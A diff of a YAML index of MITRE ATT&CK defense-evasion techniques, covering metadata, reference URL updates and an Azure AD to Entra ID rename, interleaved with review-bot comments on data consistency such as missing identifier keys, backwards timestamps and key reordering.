+ ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+ url: https://x.com/matthewdunwoody/status/1519846657646604289
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1070.006
atomic_tests: []
T1620:
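Review bot: the T1070.006 description now explains the `$STANDARD_INFORMATION`/`$FILE_NAME` distinction and double timestomping, but `x_mitre_detection` in the same hunk is unchanged and still cites only `WindowsIR Anti-Forensic Techniques`, even though the new `Inversecos Timestomping 2022` and `Magnet Forensics` references are specifically about spotting `$SI`/`$FN` mismatches; that is upstream ATT&CK text, so it is a candidate for an issue there rather than an edit here. Two cosmetic items visible in the hunk: the `Double Timestomping` description ends in `out there..` (double period), and `x_mitre_permissions_required` (root, SYSTEM, User) is dropped as in the other reordered objects in this diff.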
@@ -4134,9 +4219,76 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1620
atomic_tests: []
+ T1480.002:
+ technique:
+ modified: '2024-10-28T16:22:25.431Z'
+ name: Mutual Exclusion
+ description: |-
+ Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+ While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+ In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+ Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Manikantan Srinivasan, NEC Corporation India
+ - Pooja Natarajan, NEC Corporation India
+ - Nagahama Hiroki – NEC Corporation Japan
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: OS API Execution'
+ - 'File: File Creation'
+ type: attack-pattern
+ id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+ created: '2024-09-19T14:00:03.401Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1480/002
+ external_id: T1480.002
+ - source_name: Intezer RedXOR 2021
+ description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+ Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+ September 19, 2024.
+ url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+ - source_name: Sans Mutexes 2012
+ description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+ Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+ url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+ - source_name: ICS Mutexes 2015
+ description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+ to Evade Detection. Retrieved September 19, 2024.
+ url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+ - source_name: Microsoft Mutexes
+ description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+ 2024.
+ url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+ - source_name: Deep Instinct BPFDoor 2023
+ description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+ Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+ 19, 2024.
+ url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.011:
technique:
modified: '2023-11-06T20:14:51.609Z'
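Review bot: the new T1480.002 entry closes with `atomic_tests: []` but no `identifier: T1480.002` line, whereas T1556.002, T1202, T1070.006, T1620 and T1497.003 in this diff carry `identifier:` immediately before `atomic_tests:` (T1070.007, T1600.001, T1205 and T1564.011 do not); if the `identifier` key matters to consumers of this index the generator should emit it for every entry, and if it does not, the inconsistency should at least be documented. Also visible: `x_mitre_detection: ''` is empty for this technique, and the third contributor line uses an en dash (`Nagahama Hiroki – NEC Corporation Japan`) where the other two use a comma; both are upstream data.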
@@ -4200,57 +4352,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
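Review bot: the only substantive change to T1497.003 across this hunk and the final one in this range is the `Deloitte Environment Awareness` reference, whose URL gains an `/edit` suffix alongside a new retrieval date (September 13, 2024); everything removed here (contributors, platforms, domains and the other six references) is re-added unchanged further down. A Drive `/edit` view can behave differently from the bare file link (for example prompting for access), so confirm the new URL opens for a signed-out reader before merging.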
@@ -4265,6 +4370,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -4274,9 +4385,14 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1218.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:35:43.077Z'
name: 'Signed Binary Proxy Execution: CMSTP'
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
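Review bot: this hunk drops `spec_version: '2.1'` from T1497.003, and the same removal is repeated for every object visible further down, so the file no longer carries a STIX spec version anywhere; confirm that nothing consuming these index YAMLs reads that key before merging. The inserted block is otherwise a reorder plus upstream fields (`type`, `id`, `created`, `revoked`, the full `external_references` list), and the `x_mitre_modified_by_ref` removed in the previous hunk reappears here, so the net content change is small. One data-quality flag to pass upstream rather than fix here: the `Deloitte Environment Awareness` reference points at a `drive.google.com` file link ending in `/edit`, which is neither an archival URL nor guaranteed to be publicly readable.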
@@ -4338,8 +4490,8 @@ defense-evasion:
external_id: T1218.003
- source_name: Twitter CMSTP Usage Jan 2018
description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
- Retrieved April 11, 2018.
- url: https://twitter.com/ItsReallyNick/status/958789644165894146
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/958789644165894146
- source_name: Microsoft Connection Manager Oct 2009
description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
April 11, 2018.
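Review bot: the `twitter.com` to `x.com` URL rewrite here, and again below for the NickTyrer and TheDFIRReport references, correctly leaves `source_name` untouched; that key is what `(Citation: ...)` markers in the description fields resolve against, so renaming it would orphan those citations. Bumping `Retrieved` to `September 12, 2024` alongside the URL change is consistent with how the other re-verified references in this file are recorded.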
@@ -4358,13 +4510,12 @@ defense-evasion:
url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
- source_name: Twitter CMSTP Jan 2018
description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
- applocker bypass. Retrieved April 11, 2018.
- url: https://twitter.com/NickTyrer/status/958450014111633408
+ applocker bypass. Retrieved September 12, 2024.
+ url: https://x.com/NickTyrer/status/958450014111633408
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.003
atomic_tests: []
T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.002
atomic_tests: []
T1218.002:
@@ -4520,7 +4670,7 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T19:01:55.821Z'
name: 'Signed Binary Proxy Execution: Control Panel'
description: |-
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
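Review bot: the `modified` value for T1218.002 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-03-11T19:01:55.821Z`, and the same backward step recurs below for T1599.001, T1553.003, T1207, T1553.006, T1574.006, T1222, T1134.002, T1548.001, T1218.008 and T1055.013. Many of the old values in this file share the exact time-of-day `14:00:00.188Z` (see the T1497.003 and T1218.003 entries above), which looks like a stamp applied by a bulk rebuild rather than each object's own modification time, so the new per-object timestamps are probably the correct ones; say so in the PR description so the regressions are not mistaken for stale data being pulled in.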
@@ -4559,8 +4709,6 @@ defense-evasion:
- User
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.002
atomic_tests: []
T1599.001:
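Review bot: T1218.002 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with no replacement anywhere in the visible hunk, unlike T1497.003 above, where a `3.2.0` value is inserted elsewhere in the object. The same pattern recurs for T1599.001, T1207, T1218.008 and T1055.013 below. Check whether these objects still carry an attack spec version after the change, or whether the field is intentionally absent for objects the upstream dataset has not re-emitted; either way the difference from the other entries should be deliberate rather than an artefact of the generator.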
@@ -4583,7 +4731,7 @@ defense-evasion:
url: https://tools.ietf.org/html/rfc1918
description: IETF Network Working Group. (1996, February). Address Allocation
for Private Internets. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T01:45:58.951Z'
name: Network Address Translation Traversal
description: "Adversaries may bridge network boundaries by modifying a network
device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
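Review bot: the platform list for T1550 swaps `Office 365` and `Google Workspace` for `Identity Provider` and `Office Suite` (version `1.3` to `1.4`), and the same swap recurs for T1556.007, T1078.001, T1548 and T1548.005 below. Any per-platform index in this repository that is keyed on the old platform names will silently lose these techniques unless the indexing script maps or regenerates them, so confirm that the platform-named indexes were rebuilt from the same data as this file.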
@@ -4702,18 +4849,17 @@ defense-evasion:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.004:
technique:
- modified: '2024-03-28T00:01:08.337Z'
+ modified: '2024-09-12T19:37:57.867Z'
name: 'Impair Defenses: Disable or Modify System Firewall'
description: |-
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.004
atomic_tests: []
T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T04:58:58.214Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.003
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
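Review bot: the Azure AD to Entra ID rename is confined to prose and correctly leaves two kinds of identifier untouched: the literal service name `AzureADConnectAuthenticationAgentService`, which is still the real process name, and the citation keys (`Azure AD Hybrid Identity`, `Azure AD Connect for Read Teamers`, `AADInternals Azure AD On-Prem to Cloud`), which must match their `source_name` entries. The `Read Teamers` spelling in that key is a pre-existing upstream typo and has to stay as it is for the same reason.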
@@ -4905,9 +5049,9 @@ defense-evasion:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
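Review bot: most of this hunk is key reordering, not content: `x_mitre_is_subtechnique`, `x_mitre_deprecated`, `x_mitre_domains`, `x_mitre_version` and `x_mitre_contributors` are deleted lower in the object and re-inserted higher up, and `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` move from the object's tail (removed in the next hunk) to here. The substantive changes are the platform swap and `x_mitre_version: '1.0'` to `'1.1'`. If the generator can emit keys in a stable order, future diffs of this file would show only real changes, which makes review of a file this large far more reliable.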
@@ -4970,9 +5115,6 @@ defense-evasion:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.015:
technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.012:
technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.012
atomic_tests: []
T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
Retrieved March 30, 2018.
source_name: ADDSecurity DCShadow Feb 2018
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:20:04.850Z'
name: Rogue Domain Controller
description: |-
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5167,8 +5307,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1207
atomic_tests: []
T1553.006:
@@ -5258,7 +5396,7 @@ defense-evasion:
Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
Driver Loader)"
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:03.480Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1112:
@@ -5451,12 +5587,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1112
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5475,6 +5610,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
